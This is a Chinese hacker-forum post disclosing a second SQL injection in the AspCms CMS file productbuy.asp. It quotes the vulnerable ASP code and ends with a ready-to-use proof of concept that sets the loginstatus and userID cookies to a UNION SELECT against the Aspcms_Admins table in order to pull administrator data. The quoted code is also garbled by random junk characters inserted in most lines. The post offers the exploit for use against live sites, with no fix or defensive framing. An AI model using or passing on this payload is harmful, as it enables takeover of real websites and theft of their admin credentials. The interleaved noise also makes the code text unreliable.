好久没上土司了,上来一看发现在删号名单内.....
也没啥好发的,前些天路过某个小站,用的是AspCms这个系统,搜索了下,productbuy.asp这个文件存在注入,但是目标已经修补了。下载了代码之后发现很奇葩:官方虽然在productbuy.asp里修补了网上提到的漏洞,但就在同一个文件下面又找到了另一处注入漏洞。
废话不多说,看代码:
<%
& M3 A5 Q* I/ Z" x4 ]
- {" f+ b3 n" s. B2 Y/ v2 |if action = "buy" then) k; ~3 Q8 ~8 A5 p
" N n4 j. ^$ M2 c0 ?0 g
addOrder()
7 E# u9 Z% I a" S) t* @# v5 _" u& \* @: |" w0 h, ]. i
else
) i( o, T: k4 o5 W! I: E( l5 H" O4 X7 F2 k+ n- j
echoContent()
& _0 W* e; e" _4 @( I/ b- I- p; J5 V0 C3 }& ?0 N- J
end if
……略过
" c8 r7 D: M6 o7 D8 CSub echoContent()' Q7 S0 r0 R5 g
2 G2 a& M' v8 x3 S
dim id
& x. c7 G) N, K
C2 w. R' ]* s" i% b" e1 ? id=getForm("id","get")' {7 H+ f8 t% K/ ^* p/ j
! a/ L. x9 S% r) G% I o# D , t8 a9 A+ ]$ _% X1 ?, D
9 k1 F! M' l$ z
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
T& q6 w. N7 P) t' b. O
1 n7 u( J- b+ k9 \- g8 | v& _ I0 f- f. x# W/ f/ f
4 {' _. \1 R; S7 x dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")9 \6 G* U* K7 A
8 k6 {- G& S" k; B dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
/ U' d5 Z& {7 R$ b. [6 c8 G2 Y- ~: {3 A# q+ J5 n1 T$ U
Dim templatePath,tempStr4 Z; D ?# g! T) U
+ e8 Q6 A N2 E templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"# h# G P ~1 k! i& |6 y
+ M) |; v9 `- ~1 O4 G |
4 g# J* B# a0 R; y
/ V! R" B( b, q set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")8 V; e" U) s0 H& z6 G
- X4 k0 L1 q8 U$ M5 L; F selectproduct=rsObj(0)0 d0 e: Z. @% S- @0 g
! r8 s4 M1 ]" G0 M7 T
, E, P6 H4 y K/ @0 c. z2 I
! n+ z1 |% G* Q+ x Dim linkman,gender,phone,mobile,email,qq,address,postcode
8 \9 [1 k! h o8 r9 j7 G- X$ E0 Y6 M& j
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",00 t. ]) O( b0 k& ], O q" [& s3 x) `
, R# q- B0 I; J if rCookie("loginstatus")=1 then
. a" T: s9 a" \5 b/ p. P! {8 L5 p
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
, i& N3 u3 j7 Y% N- }; x; N2 b( J; k. H# G, c
linkman=rsObj("truename")
: Y6 [! \# y/ j5 s! Y1 ] C6 N* M
2 t; d: x. Q& g; `, }; K) U gender=rsObj("gender"): t# N5 U+ c# |- n3 s' U
: O! R) b4 ?1 H( w$ |$ r phone=rsObj("phone")) _ ~' h/ e2 L
# W4 l* w# x6 B- ^! F \5 v
mobile=rsObj("mobile")
, y7 _: l7 A3 w. B- ~( d6 E* J. N4 l- x
email=rsObj("email"); {1 N5 D* n/ Q; ?3 W
7 a$ r0 F. U) q
qq=rsObj("qq")$ E2 ?8 ~4 U, `8 e; @0 o4 b3 I/ V8 A
4 L9 m- W+ o' b; i+ J2 J0 C
address=rsObj("address")
o" _4 y: m4 w- [+ t
* C& u% [! D3 O1 |( a+ q postcode=rsObj("postcode") Y, Y9 E* h( j6 R
0 |6 B, g& ^% R* r else 4 d" L* L0 e0 K( T
R* W9 X3 g# b# Z9 P
gender=1
, |6 ^# q$ {' T9 y0 }# p' e& \/ h3 p- i+ z
end if
) l, E. M' [* C, _
: O2 `$ ?" B8 Y! Y- v0 k8 D rsObj.close() c/ n4 i) Q% B* U- t3 K6 K0 r
4 w5 h# r1 v% g; E& f7 z/ V* s
# n2 G1 ^( _/ n0 O
! \' \) @. A- F( Q with templateObj 5 c) @9 h' N" Z: ^! m
& N) X' W6 t5 m8 A% x# _7 r .content=loadFile(templatePath) 1 d! N6 |% I6 @# \9 z" U/ h; n0 v8 h
9 X$ N0 D2 i) e# Z7 F
.parseHtml()2 H0 Q/ y- D' o) y) n( q
. T: q1 Z" q, P
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
$ M0 ]3 Q( U/ n0 G, P
8 W2 k8 u% l9 q% M0 _6 L! \ .content=replaceStr(.content,"[aspcms:linkman]",linkman)
5 i) d W- E- m" P% r! V4 M( ^0 `% `/ I
.content=replaceStr(.content,"[aspcms:gender]",gender) ! A- e& |; s8 E5 d
, ^# K/ D8 V$ P5 D) c/ S5 _: V
.content=replaceStr(.content,"[aspcms:phone]",phone) " A5 Y6 w1 W" ^6 f4 J8 o" t' R! O
2 s5 @; O3 ]9 W0 x" u
.content=replaceStr(.content,"[aspcms:mobile]",mobile) : X) Y0 k1 U# }- G+ k
0 r9 D& g: i5 R d
.content=replaceStr(.content,"[aspcms:email]",email) - G! Z) ]1 M% A" H
/ M9 U6 U) r1 L! x) [
.content=replaceStr(.content,"[aspcms:qq]",qq)
T. B8 R" p! _, K/ {5 E9 f/ b4 G9 N# r' R6 g! t
.content=replaceStr(.content,"[aspcms:address]",address) $ D2 b1 h, a$ e
5 i# {3 S6 Y. R7 x2 k% k, I
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
& G; H6 Z/ Y. F' p2 |0 h! @8 o5 o1 }- o: {
.parseCommon() ' y2 i: A9 X( @8 R! W
/ @% n# O; g& E% t3 a! O$ O
echo .content - S; Q; F4 e/ |# x+ L8 |8 l
+ j4 @( x) i3 z# D, z: b( l1 [ end with
& r% h8 i( e7 @% {# q, l. c9 ?- C( l8 J% H6 w: o* y1 l# K
set templateobj =nothing : terminateAllObjects
& R+ f: u4 V" \5 I6 w/ {3 f5 \; t: X: H' b
End Sub
漏洞很明显,没啥好说的。
poc:
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
* K9 W% U0 ]0 {2 w5 A/ C- l/ V9 O/ a: g
|